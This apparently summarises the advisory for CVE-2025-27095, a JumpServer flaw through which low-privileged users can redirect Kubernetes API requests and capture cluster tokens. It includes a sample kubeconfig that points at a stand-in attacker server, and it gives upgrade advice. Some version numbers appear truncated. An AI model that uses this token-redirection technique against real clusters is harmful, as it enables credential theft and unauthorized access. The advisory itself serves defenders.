CVE-2025-27095: JumpServer Kubernetes Session Vulnerability - Unauthorized Access and Security Compromise

JumpServer is a popular open-source bastion host and an operation and maintenance security audit system, which plays a critical role in maintaining and securing IT infrastructure for many organizations. Recently, a vulnerability has been discovered, CVE-2025-27095, which affects JumpServer versions before 4.8. and 3.10.18. With this vulnerability, attackers can get unauthorized access to the Kubernetes cluster and potentially compromise its security.

Exploit Details

The vulnerability is centered around the Kubernetes session feature in JumpServer. Attackers with low-privileged accounts can manipulate the kubeconfig file to redirect API requests to an external server controlled by the attacker. This allows the attacker to intercept and capture the Kubernetes cluster token, and potentially gain unauthorized access to the cluster, which can compromise its security.

Here's an example of a manipulated kubeconfig file

apiVersion: v1
kind: Config
clusters:
- cluster:
    server: https://attacker-controlled-server/
  name: vulnerable-k8s
contexts:
- context:
    cluster: vulnerable-k8s
    user: demo-user
  name: demo-user@vulnerable-k8s
current-context: demo-user@vulnerable-k8s
users:
- name: demo-user
  user:
    token: <captured_kubernetes_cluster_token>

Links to Original References

- JumpServer GitHub repository
- JumpServer official release notes for v4.8.
- JumpServer official release notes for v3.10.18

Mitigation and Fix

The developers of JumpServer have already patched this vulnerability in version 4.8. and 3.10.18. If you are running an older version of JumpServer, it is highly recommended to update to the latest version, which contains the fix:

- Download JumpServer v4.8.
- Download JumpServer v3.10.18

Conclusion

CVE-2025-27095 is a serious vulnerability in JumpServer, which potentially allows unauthorized access to Kubernetes clusters and compromising their security. Make sure to update your JumpServer instance to version 4.8. or 3.10.18 to protect your environment from this vulnerability. Stay safe, secure, and maintain vigilance.

Timeline

Published on: 03/31/2025 16:15:23 UTC
Last modified on: 04/01/2025 20:26:22 UTC